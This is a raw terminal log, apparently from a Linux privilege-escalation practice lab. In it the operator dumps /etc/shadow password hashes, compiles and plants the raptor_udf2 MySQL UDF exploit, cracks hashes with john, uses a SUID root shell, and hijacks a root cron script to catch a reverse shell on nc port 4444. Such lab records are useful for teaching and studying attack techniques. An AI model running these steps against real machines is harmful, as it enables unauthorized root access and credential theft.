2068gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
2069nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
2070libuuid:x:100:101::/var/lib/libuuid:/bin/sh
2071Debian-exim:x:101:103::/var/spool/exim4:/bin/false
2072sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
2073user:x:1000:1000:user,,,:/home/user:/bin/bash
2074statd:x:103:65534::/var/lib/nfs:/bin/false
2075mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
2076rootbash-4.1# cat /etc/hosts
2077127.0.0.1 localhost
2078127.0.1.1 debian.localdomain debian
2079
2080# The following lines are desirable for IPv6 capable hosts
2081::1 ip6-localhost ip6-loopback
2082fe00::0 ip6-localnet
2083ff00::0 ip6-mcastprefix
2084ff02::1 ip6-allnodes
2085ff02::2 ip6-allrouters
2086rootbash-4.1# ls -l /etc/shadow
2087-rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow
2088rootbash-4.1# cat /etc/shadow
2089root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:
209017298:0:99999:7:::
2091daemon:*:17298:0:99999:7:::
2092bin:*:17298:0:99999:7:::
2093sys:*:17298:0:99999:7:::
2094sync:*:17298:0:99999:7:::
2095games:*:17298:0:99999:7:::
2096man:*:17298:0:99999:7:::
2097lp:*:17298:0:99999:7:::
2098mail:*:17298:0:99999:7:::
2099news:*:17298:0:99999:7:::
2100uucp:*:17298:0:99999:7:::
2101proxy:*:17298:0:99999:7:::
2102www-data:*:17298:0:99999:7:::
2103backup:*:17298:0:99999:7:::
2104list:*:17298:0:99999:7:::
2105irc:*:17298:0:99999:7:::
2106gnats:*:17298:0:99999:7:::
2107nobody:*:17298:0:99999:7:::
2108libuuid:!:17298:0:99999:7:::
2109Debian-exim:!:17298:0:99999:7:::
2110sshd:*:17298:0:99999:7:::
2111user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:
211217298:0:99999:7:::
2113statd:*:17299:0:99999:7:::
2114mysql:!:18133:0:99999:7:::
2115rootbash-4.1# wget
2116wget: missing URL
2117Usage: wget [OPTION]... [URL]...
2118
2119Try ‘wget --help’ for more options.
2120rootbash-4.1# pwd
2121/home/user/tools/mysql-udf
2122rootbash-4.1# ls
2123raptor_udf2.c raptor_udf2.o raptor_udf2.so
2124rootbash-4.1# cd ..
2125rootbash-4.1# ls
2126kernel-exploits mysql-udf nginx privesc-scripts sudo suid
2127rootbash-4.1# cd ..
2128rootbash-4.1# ls
2129myvpn.ovpn tools
2130rootbash-4.1# cd tools/
2131rootbash-4.1# ls
2132kernel-exploits mysql-udf nginx privesc-scripts sudo suid
2133rootbash-4.1# cd privesc-scripts/
2134rootbash-4.1# ls
2135LinEnum.sh linpeas.sh lse.sh
2136rootbash-4.1# john --wordlist =/usr/share/wordlists/rockyou.txt hash.txt
2137login as: user
2138user@10.10.170.166's password:
2139Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
2140
2141The programs included with the Debian GNU/Linux system are free software;
2142the exact distribution terms for each program are described in the
2143individual files in /usr/share/doc/*/copyright.
2144
2145Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
2146permitted by applicable law.
2147Last login: Sun Jan 17 21:12:02 2021 from ip-10-9-252-16.eu-west-1.compute.inter nal
2148user@debian:~$ cd /home/user/tools/mysql.udf
2149-bash: cd: /home/user/tools/mysql.udf: No such file or directory
2150user@debian:~$ ls
2151myvpn.ovpn tools
2152user@debian:~$ cd tools/
2153user@debian:~/tools$ ls
2154kernel-exploits mysql-udf nginx privesc-scripts sudo suid
2155user@debian:~/tools$ gcc -g -c raptor_udf2.c -fPIC
2156gcc: raptor_udf2.c: No such file or directory
2157gcc: no input files
2158user@debian:~/tools$ cd mysql-udf/
2159user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
2160user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o re aptor_udf2.so raptor_udf2.o -1c
2161gcc: unrecognized option '-soname,'
2162gcc: unrecognized option '-1c'
2163user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o re aptor_udf2.so raptor_udf2.o -lc
2164gcc: unrecognized option '-soname,'
2165user@debian:~/tools/mysql-udf$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o rapt or_udf2.so raptor_udf2.o -lc
2166user@debian:~/tools/mysql-udf$ mysql -u root
2167Welcome to the MySQL monitor. Commands end with ; or \g.
2168Your MySQL connection id is 37
2169Server version: 5.1.73-1+deb6u1 (Debian)
2170
2171Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
2172
2173Oracle is a registered trademark of Oracle Corporation and/or its
2174affiliates. Other names may be trademarks of their respective
2175owners.
2176
2177Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
2178
2179mysql> use mysql;
2180Reading table information for completion of table and column names
2181You can turn off this feature to get a quicker startup with -A
2182
2183Database changed
2184mysql> create table bmillakid(line blob);
2185Query OK, 0 rows affected (0.00 sec)
2186
2187mysql> insert into bmillakid values(load_file('home/usr/tools/mysql-udf/raptor_u df2.so' ));
2188Query OK, 1 row affected (0.00 sec)
2189
2190mysql> select * from bmillakid into dumpfile '/usr/lib/mysql/plugin/raptor_udf2. so';
2191ERROR 1086 (HY000): File '/usr/lib/mysql/plugin/raptor_udf2.so' already exists
2192mysql> exit
2193Bye
2194user@debian:~/tools/mysql-udf$ who am i
2195user pts/0 2021-01-17 21:14 (ip-10-9-252-16.eu-west-1.compute.interna l)
2196user@debian:~/tools/mysql-udf$ links
2197-bash: links: command not found
2198user@debian:~/tools/mysql-udf$ lynx
2199-bash: lynx: command not found
2200user@debian:~/tools/mysql-udf$ wget
2201wget: missing URL
2202Usage: wget [OPTION]... [URL]...
2203
2204Try ‘wget --help’ for more options.
2205user@debian:~/tools/mysql-udf$ cat /etc/shadow
2206root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8 r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
2207daemon:*:17298:0:99999:7:::
2208bin:*:17298:0:99999:7:::
2209sys:*:17298:0:99999:7:::
2210sync:*:17298:0:99999:7:::
2211games:*:17298:0:99999:7:::
2212man:*:17298:0:99999:7:::
2213lp:*:17298:0:99999:7:::
2214mail:*:17298:0:99999:7:::
2215news:*:17298:0:99999:7:::
2216uucp:*:17298:0:99999:7:::
2217proxy:*:17298:0:99999:7:::
2218www-data:*:17298:0:99999:7:::
2219backup:*:17298:0:99999:7:::
2220list:*:17298:0:99999:7:::
2221irc:*:17298:0:99999:7:::
2222gnats:*:17298:0:99999:7:::
2223nobody:*:17298:0:99999:7:::
2224libuuid:!:17298:0:99999:7:::
2225Debian-exim:!:17298:0:99999:7:::
2226sshd:*:17298:0:99999:7:::
2227user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjw YpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7:::
2228statd:*:17299:0:99999:7:::
2229mysql:!:18133:0:99999:7:::
2230bmillakid:!:18645:0:99999:7:::
2231user@debian:~/tools/mysql-udf$ cat /etc/passwd
2232root:x:0:0:root:/root:/bin/bash
2233daemon:x:1:1:daemon:/usr/sbin:/bin/sh
2234bin:x:2:2:bin:/bin:/bin/sh
2235sys:x:3:3:sys:/dev:/bin/sh
2236sync:x:4:65534:sync:/bin:/bin/sync
2237games:x:5:60:games:/usr/games:/bin/sh
2238man:x:6:12:man:/var/cache/man:/bin/sh
2239lp:x:7:7:lp:/var/spool/lpd:/bin/sh
2240mail:x:8:8:mail:/var/mail:/bin/sh
2241news:x:9:9:news:/var/spool/news:/bin/sh
2242uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
2243proxy:x:13:13:proxy:/bin:/bin/sh
2244www-data:x:33:33:www-data:/var/www:/bin/sh
2245backup:x:34:34:backup:/var/backups:/bin/sh
2246list:x:38:38:Mailing List Manager:/var/list:/bin/sh
2247irc:x:39:39:ircd:/var/run/ircd:/bin/sh
2248gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
2249nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
2250libuuid:x:100:101::/var/lib/libuuid:/bin/sh
2251Debian-exim:x:101:103::/var/spool/exim4:/bin/false
2252sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
2253user:x:1000:1000:user,,,:/home/user:/bin/bash
2254statd:x:103:65534::/var/lib/nfs:/bin/false
2255mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
2256bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
2257user@debian:~/tools/mysql-udf$ ls -la user
2258ls: cannot access user: No such file or directory
2259user@debian:~/tools/mysql-udf$ pwd
2260/home/user/tools/mysql-udf
2261user@debian:~/tools/mysql-udf$ who am i
2262user pts/0 2021-01-17 21:14 (ip-10-9-252-16.eu-west-1.compute.interna l)
2263user@debian:~/tools/mysql-udf$ whoami
2264user
2265user@debian:~/tools/mysql-udf$ ls -la /
2266total 96
2267drwxr-xr-x 22 root root 4096 Aug 25 2019 .
2268drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
2269drwxr-xr-x 2 root root 4096 Aug 25 2019 bin
2270drwxr-xr-x 3 root root 4096 May 12 2017 boot
2271drwxr-xr-x 12 root root 2820 Jan 17 19:55 dev
2272drwxr-xr-x 67 root root 4096 Jan 17 21:16 etc
2273drwxr-xr-x 3 root root 4096 May 15 2017 home
2274lrwxrwxrwx 1 root root 30 May 12 2017 initrd.img -> boot/initrd.img-2.6.32- 5-amd64
2275drwxr-xr-x 12 root root 12288 May 14 2017 lib
2276lrwxrwxrwx 1 root root 4 May 12 2017 lib64 -> /lib
2277drwx------ 2 root root 16384 May 12 2017 lost+found
2278drwxr-xr-x 3 root root 4096 May 12 2017 media
2279drwxr-xr-x 2 root root 4096 Jun 11 2014 mnt
2280drwxr-xr-x 2 root root 4096 May 12 2017 opt
2281dr-xr-xr-x 96 root root 0 Jan 17 19:53 proc
2282drwx------ 5 root root 4096 May 15 2020 root
2283drwxr-xr-x 2 root root 4096 May 13 2017 sbin
2284drwxr-xr-x 2 root root 4096 Jul 21 2010 selinux
2285drwxr-xr-x 2 root root 4096 May 12 2017 srv
2286drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
2287drwxr-xr-x 13 root root 0 Jan 17 19:53 sys
2288drwxrwxrwt 2 root root 4096 Jan 17 21:19 tmp
2289drwxr-xr-x 11 root root 4096 May 13 2017 usr
2290drwxr-xr-x 14 root root 4096 May 13 2017 var
2291lrwxrwxrwx 1 root root 27 May 12 2017 vmlinuz -> boot/vmlinuz-2.6.32-5-amd6 4
2292user@debian:~/tools/mysql-udf$ whoami
2293user
2294user@debian:~/tools/mysql-udf$ sudo -l
2295Matching Defaults entries for user on this host:
2296 env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
2297
2298User user may run the following commands on this host:
2299 (root) NOPASSWD: /usr/sbin/iftop
2300 (root) NOPASSWD: /usr/bin/find
2301 (root) NOPASSWD: /usr/bin/nano
2302 (root) NOPASSWD: /usr/bin/vim
2303 (root) NOPASSWD: /usr/bin/man
2304 (root) NOPASSWD: /usr/bin/awk
2305 (root) NOPASSWD: /usr/bin/less
2306 (root) NOPASSWD: /usr/bin/ftp
2307 (root) NOPASSWD: /usr/bin/nmap
2308 (root) NOPASSWD: /usr/sbin/apache2
2309 (root) NOPASSWD: /bin/more
2310user@debian:~/tools/mysql-udf$ cat /etc/shadow | grep root
2311root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8 r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
2312user@debian:~/tools/mysql-udf$ ls -l /etc/passwd
2313-rw-r--r-- 1 root root 1056 Jan 17 20:33 /etc/passwd
2314user@debian:~/tools/mysql-udf$ openssl passwd l33th4x0rbr0!
2315Warning: truncating password to 8 characters
23165v3Bvw7Nf6Zbs
2317user@debian:~/tools/mysql-udf$
2318user@debian:~/tools/mysql-udf$ 5v3Bvw7Nf6Zbs
2319-bash: 5v3Bvw7Nf6Zbs: command not found
2320user@debian:~/tools/mysql-udf$ nano /etc/passwd
2321user@debian:~/tools/mysql-udf$ /tmp/rootbash -p
2322rootbash-4.1# su newroot
2323Unknown id: newroot
2324rootbash-4.1# whoami
2325root
2326rootbash-4.1# cat /etc/passwd
2327root:x:0:0:root:/root:/bin/bash
2328daemon:x:1:1:daemon:/usr/sbin:/bin/sh
2329bin:x:2:2:bin:/bin:/bin/sh
2330sys:x:3:3:sys:/dev:/bin/sh
2331sync:x:4:65534:sync:/bin:/bin/sync
2332games:x:5:60:games:/usr/games:/bin/sh
2333man:x:6:12:man:/var/cache/man:/bin/sh
2334lp:x:7:7:lp:/var/spool/lpd:/bin/sh
2335mail:x:8:8:mail:/var/mail:/bin/sh
2336news:x:9:9:news:/var/spool/news:/bin/sh
2337uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
2338proxy:x:13:13:proxy:/bin:/bin/sh
2339www-data:x:33:33:www-data:/var/www:/bin/sh
2340backup:x:34:34:backup:/var/backups:/bin/sh
2341list:x:38:38:Mailing List Manager:/var/list:/bin/sh
2342irc:x:39:39:ircd:/var/run/ircd:/bin/sh
2343gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
2344nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
2345libuuid:x:100:101::/var/lib/libuuid:/bin/sh
2346Debian-exim:x:101:103::/var/spool/exim4:/bin/false
2347sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
2348user:x:1000:1000:user,,,:/home/user:/bin/bash
2349statd:x:103:65534::/var/lib/nfs:/bin/false
2350mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
2351bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
2352rootbash-4.1# su root
2353Password:
2354su: Authentication failure
2355rootbash-4.1# exit
2356exit
2357user@debian:~/tools/mysql-udf$ sudo -l
2358Matching Defaults entries for user on this host:
2359 env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
2360
2361User user may run the following commands on this host:
2362 (root) NOPASSWD: /usr/sbin/iftop
2363 (root) NOPASSWD: /usr/bin/find
2364 (root) NOPASSWD: /usr/bin/nano
2365 (root) NOPASSWD: /usr/bin/vim
2366 (root) NOPASSWD: /usr/bin/man
2367 (root) NOPASSWD: /usr/bin/awk
2368 (root) NOPASSWD: /usr/bin/less
2369 (root) NOPASSWD: /usr/bin/ftp
2370 (root) NOPASSWD: /usr/bin/nmap
2371 (root) NOPASSWD: /usr/sbin/apache2
2372 (root) NOPASSWD: /bin/more
2373user@debian:~/tools/mysql-udf$ cat /etc/crontab
2374# /etc/crontab: system-wide crontab
2375# Unlike any other crontab you don't have to run the `crontab'
2376# command to install the new version when you edit this file
2377# and files in /etc/cron.d. These files also have username fields,
2378# that none of the other crontabs do.
2379
2380SHELL=/bin/sh
2381PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
2382
2383# m h dom mon dow user command
238417 * * * * root cd / && run-parts --report /etc/cron.hourly
238525 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
238647 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
238752 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
2388#
2389* * * * * root overwrite.sh
2390* * * * * root /usr/local/bin/compress.sh
2391
2392user@debian:~/tools/mysql-udf$ locate overwrite.sh
2393locate: warning: database `/var/cache/locate/locatedb' is more than 8 days old (actual age is 247.7 days)
2394/usr/local/bin/overwrite.sh
2395user@debian:~/tools/mysql-udf$ ls -l /usr/local/bin/overwrite.sh
2396-rwxr--rw- 1 root staff 40 May 13 2017 /usr/local/bin/overwrite.sh
2397user@debian:~/tools/mysql-udf$ cd /usr/local/bin/
2398user@debian:/usr/local/bin$ ls
2399compress.sh overwrite.sh suid-env suid-env2 suid-so
2400user@debian:/usr/local/bin$ cat overwrite.sh
2401#!/bin/bash
2402
2403echo `date` > /tmp/useless
2404user@debian:/usr/local/bin$ nano overwrite.sh
2405user@debian:/usr/local/bin$ nc -nvlp 4444
2406listening on [any] 4444 ...
2407connect to [10.10.170.166] from (UNKNOWN) [10.10.170.166] 37728
2408allexport off
2409braceexpand on
2410emacs on
2411errexit off
2412errtrace off
2413functrace off
2414hashall on
2415histexpand on
2416history on
2417ignoreeof off
2418interactive-comments on
2419keyword off
2420monitor off
2421noclobber off
2422noexec off
2423noglob off
2424nolog off
2425notify off
2426nounset off
2427onecmd off
2428physical off
2429pipefail off
2430posix off
2431privileged off
2432verbose off
2433vi off
2434xtrace off
2435id
2436uid=0(root) gid=0(root) groups=0(root)
2437ls
2438cat /etc/passwd
2439root:x:0:0:root:/root:/bin/bash
2440daemon:x:1:1:daemon:/usr/sbin:/bin/sh
2441bin:x:2:2:bin:/bin:/bin/sh
2442sys:x:3:3:sys:/dev:/bin/sh
2443sync:x:4:65534:sync:/bin:/bin/sync
2444games:x:5:60:games:/usr/games:/bin/sh
2445man:x:6:12:man:/var/cache/man:/bin/sh
2446lp:x:7:7:lp:/var/spool/lpd:/bin/sh
2447mail:x:8:8:mail:/var/mail:/bin/sh
2448news:x:9:9:news:/var/spool/news:/bin/sh
2449uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
2450proxy:x:13:13:proxy:/bin:/bin/sh
2451www-data:x:33:33:www-data:/var/www:/bin/sh
2452backup:x:34:34:backup:/var/backups:/bin/sh
2453list:x:38:38:Mailing List Manager:/var/list:/bin/sh
2454irc:x:39:39:ircd:/var/run/ircd:/bin/sh
2455gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
2456nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
2457libuuid:x:100:101::/var/lib/libuuid:/bin/sh
2458Debian-exim:x:101:103::/var/spool/exim4:/bin/false
2459sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
2460user:x:1000:1000:user,,,:/home/user:/bin/bash
2461statd:x:103:65534::/var/lib/nfs:/bin/false
2462mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
2463bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
2464user@debian:/usr/local/bin$
2465
2466login as: user
2467user@10.10.170.166's password:
2468Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
2469
2470The programs included with the Debian GNU/Linux system are free software;
2471the exact distribution terms for each program are described in the
2472individual files in /usr/share/doc/*/copyright.
2473
2474Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
2475permitted by applicable law.
2476Last login: Sun Jan 17 21:14:02 2021 from ip-10-9-252-16.eu-west-1.compute.internal
2477user@debian:~$ dmesg | grep /var/log/messages > l33t.txt
2478user@debian:~$ cat l33t.txt
2479user@debian:~$ ls
2480l33t.txt myvpn.ovpn tools
2481user@debian:~$ cat l33t.txt
2482user@debian:~$ ls
2483l33t.txt myvpn.ovpn tools
2484user@debian:~$ dmesg | grep /var/log/messages
2485user@debian:~$ tail -f /var/log/messages
2486tail: cannot open `/var/log/messages' for reading: Permission denied
2487user@debian:~$ tail -f /var/log/messages | less
2488user@debian:~$ tail -f /var/log/auth.log
2489tail: cannot open `/var/log/auth.log' for reading: Permission denied
2490user@debian:~$ /tmp/rootbash -p
2491rootbash-4.1# tail -f /var/log/messages
2492Jan 17 19:55:44 debian kernel: [ 116.943577] RPC: Registered tcp transport module.
2493Jan 17 19:55:44 debian kernel: [ 116.943578] RPC: Registered tcp NFSv4.1 backchannel transport module.
2494Jan 17 19:55:44 debian kernel: [ 117.026375] Slow work thread pool: Starting up
2495Jan 17 19:55:44 debian kernel: [ 117.026397] Slow work thread pool: Ready
2496Jan 17 19:55:44 debian kernel: [ 117.026419] FS-Cache: Loaded
2497Jan 17 19:55:44 debian kernel: [ 117.201005] FS-Cache: Netfs 'nfs' registered for caching
2498Jan 17 19:55:44 debian kernel: [ 117.326456] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
2499Jan 17 19:55:48 debian kernel: [ 130.271583] svc: failed to register lockdv1 RPC service (errno 97).
2500Jan 17 19:55:48 debian kernel: [ 130.272088] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
2501Jan 17 19:55:48 debian kernel: [ 130.272101] NFSD: starting 90-second grace period
2502
2503
2504
2505
2506
2507ls
2508^C
2509rootbash-4.1# cat /var/log/messages
2510May 15 06:25:03 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1345" x-info="http://www.rsyslog.com"] rsyslogd was HUPed, type 'lightweight'.
2511May 15 11:32:35 debian kernel: imklog 4.6.4, log source = /proc/kmsg started.
2512May 15 11:32:35 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1418" x-info="http://www.rsyslog.com"] (re)start
2513May 15 11:32:35 debian kernel: [ 0.000000] Initializing cgroup subsys cpuset
2514May 15 11:32:35 debian kernel: [ 0.000000] Initializing cgroup subsys cpu
2515May 15 11:32:35 debian kernel: [ 0.000000] Linux version 2.6.32-5-amd64 (Debian 2.6.32-48squeeze6) (jmm@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Tue May 13 16:34:35 UTC 2014
2516May 15 11:32:35 debian kernel: [ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
2517May 15 11:32:35 debian kernel: [ 0.000000] KERNEL supported cpus:
2518May 15 11:32:35 debian kernel: [ 0.000000] Intel GenuineIntel
2519May 15 11:32:35 debian kernel: [ 0.000000] AMD AuthenticAMD
2520May 15 11:32:35 debian kernel: [ 0.000000] Centaur CentaurHauls
2521May 15 11:32:35 debian kernel: [ 0.000000] BIOS-provided physical RAM map:
2522May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009e000 (usable)
2523May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 000000000009e000 - 00000000000a0000 (reserved)
2524May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved)
2525May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000000100000 - 00000000f0000000 (usable)
2526May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 00000000fc000000 - 0000000100000000 (reserved)
2527May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000100000000 - 00000003d0000000 (usable)
2528May 15 11:32:35 debian kernel: [ 0.000000] DMI 2.7 present.
2529May 15 11:32:35 debian kernel: [ 0.000000] last_pfn = 0x3d0000 max_arch_pfn = 0x400000000
2530May 15 11:32:35 debian kernel: [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106
2531May 15 11:32:35 debian kernel: [ 0.000000] last_pfn = 0xf0000 max_arch_pfn = 0x400000000
2532May 15 11:32:35 debian kernel: [ 0.000000] init_memory_mapping: 0000000000000000-00000000f0000000
2533May 15 11:32:35 debian kernel: [ 0.000000] init_memory_mapping: 0000000100000000-00000003d0000000
2534May 15 11:32:35 debian kernel: [ 0.000000] RAMDISK: 37709000 - 37fefa59
2535May 15 11:32:35 debian kernel: [ 0.000000] ACPI: RSDP 00000000000ea020 00024 (v02 Xen)
2536May 15 11:32:35 debian kernel: [ 0.000000] ACPI: XSDT 00000000fc00e2a0 00054 (v01 Xen HVM 00000000 HVML 00000000)
2537May 15 11:32:35 debian kernel: [ 0.000000] ACPI: FACP 00000000fc00df60 000F4 (v04 Xen HVM 00000000 HVML 00000000)
2538May 15 11:32:35 debian kernel: [ 0.000000] ACPI: DSDT 00000000fc0021c0 0BD19 (v02 Xen HVM 00000000 INTL 20090123)
2539May 15 11:32:35 debian kernel: [ 0.000000] ACPI: FACS 00000000fc002180 00040
2540May 15 11:32:35 debian kernel: [ 0.000000] ACPI: APIC 00000000fc00e060 000D8 (v02 Xen HVM 00000000 HVML 00000000)
2541May 15 11:32:35 debian kernel: [ 0.000000] ACPI: HPET 00000000fc00e1b0 00038 (v01 Xen HVM 00000000 HVML 00000000)
2542May 15 11:32:35 debian kernel: [ 0.000000] ACPI: WAET 00000000fc00e1f0 00028 (v01 Xen HVM 00000000 HVML 00000000)
2543May 15 11:32:35 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e220 00031 (v02 Xen HVM 00000000 INTL 20090123)
2544May 15 11:32:35 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e260 00033 (v02 Xen HVM 00000000 INTL 20090123)
2545May 15 11:32:35 debian kernel: [ 0.000000] No NUMA configuration found
2546May 15 11:32:35 debian kernel: [ 0.000000] Faking a node at 0000000000000000-00000003d0000000
2547May 15 11:32:35 debian kernel: [ 0.000000] Bootmem setup node 0 0000000000000000-00000003d0000000
2548May 15 11:32:35 debian kernel: [ 0.000000] NODE_DATA [0000000000017000 - 000000000001efff]
2549May 15 11:32:35 debian kernel: [ 0.000000] bootmap [000000000001f000 - 0000000000098fff] pages 7a
2550May 15 11:32:35 debian kernel: [ 0.000000] (8 early reservations) ==> bootmem [0000000000 - 03d0000000]
2551May 15 11:32:35 debian kernel: [ 0.000000] #0 [0000000000 - 0000001000] BIOS data page ==> [0000000000 - 0000001000]
2552May 15 11:32:35 debian kernel: [ 0.000000] #1 [0000006000 - 0000008000] TRAMPOLINE ==> [0000006000 - 0000008000]
2553May 15 11:32:35 debian kernel: [ 0.000000] #2 [0001000000 - 00016d7584] TEXT DATA BSS ==> [0001000000 - 00016d7584]
2554May 15 11:32:35 debian kernel: [ 0.000000] #3 [0037709000 - 0037fefa59] RAMDISK ==> [0037709000 - 0037fefa59]
2555May 15 11:32:35 debian kernel: [ 0.000000] #4 [000009e000 - 0000100000] BIOS reserved ==> [000009e000 - 0000100000]
2556May 15 11:32:35 debian kernel: [ 0.000000] #5 [00016d8000 - 00016d80c8] BRK ==> [00016d8000 - 00016d80c8]
2557May 15 11:32:35 debian kernel: [ 0.000000] #6 [0000008000 - 000000b000] PGTABLE ==> [0000008000 - 000000b000]
2558May 15 11:32:35 debian kernel: [ 0.000000] #7 [000000b000 - 0000017000] PGTABLE ==> [000000b000 - 0000017000]
2559May 15 11:32:35 debian kernel: [ 0.000000] found SMP MP-table at [ffff8800000fbc50] fbc50
2560May 15 11:32:35 debian kernel: [ 0.000000] Zone PFN ranges:
2561May 15 11:32:35 debian kernel: [ 0.000000] DMA 0x00000000 -> 0x00001000
2562May 15 11:32:35 debian kernel: [ 0.000000] DMA32 0x00001000 -> 0x00100000
2563May 15 11:32:35 debian kernel: [ 0.000000] Normal 0x00100000 -> 0x003d0000
2564May 15 11:32:35 debian kernel: [ 0.000000] Movable zone start PFN for each node
2565May 15 11:32:35 debian kernel: [ 0.000000] early_node_map[3] active PFN ranges
2566May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00000000 -> 0x0000009e
2567May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00000100 -> 0x000f0000
2568May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00100000 -> 0x003d0000
2569May 15 11:32:35 debian kernel: [ 0.000000] ACPI: PM-Timer IO Port: 0xb008
2570May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
2571May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x02] enabled)
2572May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled)
2573May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x03] enabled)
2574May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x00] disabled)
2575May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x05] lapic_id[0x00] disabled)
2576May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x06] lapic_id[0x00] disabled)
2577May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x07] lapic_id[0x00] disabled)
2578May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x08] lapic_id[0x00] disabled)
2579May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x09] lapic_id[0x00] disabled)
2580May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0a] lapic_id[0x00] disabled)
2581May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0b] lapic_id[0x00] disabled)
2582May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0c] lapic_id[0x00] disabled)
2583May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0d] lapic_id[0x00] disabled)
